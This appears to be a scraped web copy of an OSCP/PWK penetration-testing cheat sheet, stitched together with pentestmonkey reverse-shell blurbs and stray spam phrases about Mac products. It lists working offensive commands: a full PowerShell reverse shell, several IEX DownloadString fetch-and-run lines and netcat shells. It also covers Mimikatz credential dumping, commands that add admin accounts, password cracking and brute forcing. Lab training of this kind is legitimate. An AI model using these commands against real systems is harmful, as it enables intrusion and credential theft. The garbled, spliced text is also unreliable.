Forked from sinfulz “JustTryHarder” is his “cheat sheet which will aid you through the PWK course & the OSCP Exam.”
So here:“
This is s great collection of different types of reverse shells and webshells. Many of the ones listed below comes from this cheat-sheet. Reverse Shell Cheat Sheet - 2020 update, a list of reverse shells for connecting back. Reverse Shell Cheat Sheet Posted on September 4, 2011 by pentestmonkey If you're lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you'll probably want an interactive shell. Reverse shell auto-complete Auditor IP: Auditor Port: Generate Bash bash -i & /dev/tcp/ / 0&1 exec 5/dev/tcp/ /;cat &5 &5.
JustTryHarder, a cheat sheet which will aid you through the PWK course & the OSCP Exam.
(Inspired by PayloadAllTheThings) Download vmware for mac os.
Feel free to submit a Pull Request & leave a star to share some love if this helped you. 💖
Disclaimer: none of the below includes spoilers for the PWK labs / OSCP Exam.
Credit Info:I have obtained a lot of this info through other Github repos, blogs, sites and more.I have tried to give as much credit to the original creator as possible, if I have not given you credit please contact me on Twitter: https://twitter.com/s1nfulz
Active Directory & Domain Controllers
- WIP
BOF (WIP)
(Bad Characters: 0x00, 0x0A)
- Fuzzing
- Finding eip position
- Finding bad chars
- Locating jmp esp
- Generating payload with msfvenom
- Getting reverse shell with netcat
DNS - Zone Transfers
- host -t axfr HTB.local 10.10.10.10
- host -l HTB.local 10.10.10.10
- host -l
- dig @#Hashcat - user:$1$AbCdEf123/:16903:0:99999:7:::
- hashcat -m 500 -a 0 -o cracked_password.txt –force MD5_hash.txt /usr/share/wordlists/rockyou.txt
 #John - user:$1$AbCdEf123/:16903:0:99999:7:::
- john –rules –wordlist=/usr/share/wordlists/rockyou.txt MD5_hash.txt
 Payload Generation- https://netsec.ws/?p=331
- http://security-geek.in/2016/09/07/msfvenom-cheat-sheet/
- https://www.offensive-security.com/metasploit-unleashed/payloads/
- https://github.com/swisskyrepo/PayloadsAllTheThings
- non staged = netcat
- staged = multi/handler
 PHP- https://stackoverflow.com/questions/20072696/what-is-different-between-exec-shell-exec-system-and-passthru-functions?lq=1
 Priv Esc - Linux- https://github.com/SecWiki/linux-kernel-exploits
- https://gtfobins.github.io
- https://github.com/InteliSecureLabs/Linux_Exploit_Suggester
- https://github.com/jondonas/linux-exploit-suggester-2
- https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
- grep -Ri ‘password’ .
- find / -perm –4000 2>/dev/null
- find / -user root -perm -4000 -exec ls -ldb {} ;
- which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null(then ls -la, look for 777 file permissions).
 Priv Esc - Windows- http://www.fuzzysecurity.com/tutorials/16.html
- https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
- https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc (PowerUp)
- https://github.com/M4ximuss/Powerless
- https://github.com/sagishahar/lpeworkshop
- https://github.com/411Hall/JAWS
- https://github.com/rasta-mouse/Watson
- https://github.com/rasta-mouse/Sherlock (Deprecated)
- https://github.com/GDSSecurity/Windows-Exploit-Suggester
- churrasco -d “net user /add ' 
- churrasco -d “net localgroup administrators /add' 
- churrasco -d “NET LOCALGROUP “Remote Desktop Users” /ADD' 
 Post Exploitation- Mimikatz.exe (run it)
- privilege::debug
- sekurlsa::logonpasswords
 Port Forwarding#Chisel #Plink#SSH - ssh root@10.10.10.10 -R 1234:127.0.0.1:1234
 Port Scanning#TCP - reconnoitre -t 10.10.10.10 -o . –services –quick –hostnames
- nmap -vvv -sC -sV -p- –min-rate 2000 10.10.10.10
- nmap -sT -p 22,80,110 -A
- nmap -p- -iL ips.txt > TCP_Ports.txt
 #UDP (can take hours so maybe netstat is a better alternative) - nmap -sU –top-ports 10000
- nmap -sT -sU -p 22,80,110 -A
- nmap -sT -sU -p- –min-rate 2000
- nmap -p- -sU -iL ips.txt > udp.txt
- nmap -sU -sV -iL ips.txt > alludpports.txt
 #SNMPnmap -p161 -sU -iL ips.txt > udp.txt (cmd could be wrong, double check) #SSHnmap –script ssh2-enum-algos -iL ips.txt > SSH.txt #SSLnmap -v -v –script ssl-cert,ssl-enum-ciphers,ssl-heartbleed,ssl-poodle,sslv2 -iL ips.txt > SSLScan.txt PowerShell- powershell -ExecutionPolicy ByPass -File script.ps1
 Pivoting- sshuttle -r user@10.10.10.10 10.1.1.0/24
 Remote Desktoprdesktop -u user -p password 10.10.10.10 -g 85% -r disk:share=/root/ Reverse Shells#Linux - http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- https://awansec.com/reverse-shell.html
 #Windows - https://github.com/Dhayalanb/windows-php-reverse-shell
- nc [YourIPaddr] [port] –e cmd.exe
 Shell UpgradingSource: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ & https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell SQL Injection (SQLmap)- sqlmap -u “http://example.com/test.php?test=test” –level=5 –risk=3 –batch
 Python - python -c ‘import pty;spawn(“/bin/bash”);’or
- python3 -c ‘import pty;spawn(“/bin/bash”);’
- In reverse shell:```python -c ‘import pty; pty.spawn(“/bin/bash”)’Ctrl-Z
 - In Kali
 - stty raw -echo
- fg
 - In reverse shell - reset (sometimes optional)
- export SHELL=bash
- export TERM=xterm-256color
- stty rows columns (optional)(Sometimes the command will need to be executed: export TERM=xterm)``` 
 
 Using socat Perl- perl -e ‘exec “/bin/sh”;’
- perl: exec “/bin/sh”;
 Bash/bin/sh -i Show listening ports- Linux netstat syntax - netstat -tulpn - grep LISTEN 
 
- FreeBSD/MacOS X netstat syntax - netstat -anp tcp - grep LISTEN 
- netstat -anp udp - grep LISTEN 
 
- OpenBSD netstat syntax - netstat -na -f inet - grep LISTEN 
- netstat -nat - grep LISTEN 
 
- Nmap scan syntax - sudo nmap -sT -O localhost
- sudo nmap -sU -O 192.168.2.13 ##[ list open UDP ports ]##
- sudo nmap -sT -O 192.168.2.13 ##[ list open TCP ports ]##
 
 SMB - Enumeration- https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html
- smbmap -H 10.10.10.10
- smbclient -L 10.0.0.10
- smbclient //10.10.10.10/share$
 SMB - Impacket- Impacket’s PSEXEC (After creating a remote port fwd)/usr/share/doc/python-impacket/examples/psexec.py user@10.10.10.10
 Password: (password) [*] Trying protocol 445/SMB… - Impacket’s SMBServer (For File Transfer) - cd /usr/share/windows-binaries
- python /usr/share/doc/python-impacket/examples/smbserver.py a .
- 10.10.10.10amimikatz.exe
 
 SMTP Enumerationhttps://github.com/s0wr0b1ndef/OSCP-note/blob/master/ENUMERATION/SMTP/smtp_commands.txt VMware (not going full screen)- systemctl restart open-vm-tools.service
 Web Servers:- python -m SimpleHTTPServer 80
- python3 -m http.server 80
- ngrok http 80
 Web Scanning:#Web Scanning with extensions #HTTP - gobuster dir -u http://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 69
- gobuster dir -u http://10.10.10.10 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,txt -t 69
 Photo transfer for mac. #HTTPS - gobuster dir -k -u https://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 69(in some cases –wildcard will need to be used instead of -k)
 #Nikto - nikto -h 10.10.10.10 -p 80
 #Nikto HTTPS - nikto -h 10.10.10.10. -p 443
 WFuzz - wfuzz -u http://google.com/login.php?username=admin&password=FUZZ -w /usr/share/wordlists/rockyou.txt
- wfuzz -u http://10.10.10.10/hello.php?dir=./././././././././FUZZ%00 -w /usr/share/wfuzz/wordlist/general/common.txt
 Web Shells- https://github.com/Arrexel/phpbash
- https://github.com/flozz/p0wny-shell
 WordPress- https://forum.top-hat-sec.com/index.php?topic=5758.0
 Windows Framework / Powershellbypass PowerShell execution policy```PowerShell -Exec Bypass powershell -nop -c “$client = New-Object System.Net.Sockets.TCPClient(‘10.1.3.40’,443);$stream = $client.GetStream();[byte[]]$bytes = 0.65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()” echo IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.10.10:80/PowerUp.ps1’) | powershell -noprofile - Thunderbolt ssd for mac. IEX(New-object Net.WebClient).DownloadString(‘http://10.10.10.10:80/PowerUp.ps1’) powershell -nop -exec bypass IEX “(New-Object Net.WebClient).DownloadString(‘http://10.10.14.x/Whatever.ps1’); Invoke-Whatever” xp_cmdshell powershell IEX(New-Object Net.WebClient).downloadstring('http://10.10.10.10/Nishang-ReverseShell.ps1')```Windows Post Exploitation Commands—————- - WMIC USERACCOUNT LIST BRIEF
- net user
- net localgroup Users
- net localgroup Administrators
- net user USERNAME NEWPASS /add
- net user “USER NAME” NEWPASS /add
- net localgroup administrators USERNAME /add
 Writeable Directories(Work in progress)—————- - C:WindowsSystem32SpoolDriverscolor
- C:windowstracing
- C:windowstasks
- C:windowssystem32microsoftcryptorsamachinekeys
 - To find World Writeable Directories in Linux use the command:find / -xdev -type d ( -perm -0002 -a ! -perm -1000 ) -print
 ” reverseshellReverse Shell Cheat SheetIf you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell. If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding [..] Tags: bash, cheatsheet, netcat, pentest, perl, php, python, reverseshell, ruby, xterm Posted in: Shells php-reverse-shellThis tool is designed for those situations during a pentest where you have upload access to a webserver that’s running PHP. Upload this script to somewhere in the web root then run it by accessing the appropriate URL in your browser. The script will open an outbound TCP connection from the webserver to a host [..] Tags: pentest, php, reverseshell, tool Posted in: Web Shells perl-reverse-shellNc Reverse ShellThis tool is designed for those situations during a pentest where you have upload access to a webserver that’s running PERL. Upload this script to somewhere in the web root then run it by accessing the appropriate URL in your browser. The script will open an outbound TCP connection from the webserver to a host [..] Jsp Reverse ShellTags: pentest, perl, reverseshell Posted in: Web Shells The Perfect Web BackdoorI’m sure most pentesters have had cause to use the likes of cmdasp.asp, or cobble together a simple PHP script based around “passthru” or “system”. There’s loads more functionality that would be useful in such backdoors, though. They could be made less dangerous by building in authentication, and more functional by building in database client [..] Tags: pentest, reverseshell Html Reverse ShellPosted in: Blog 
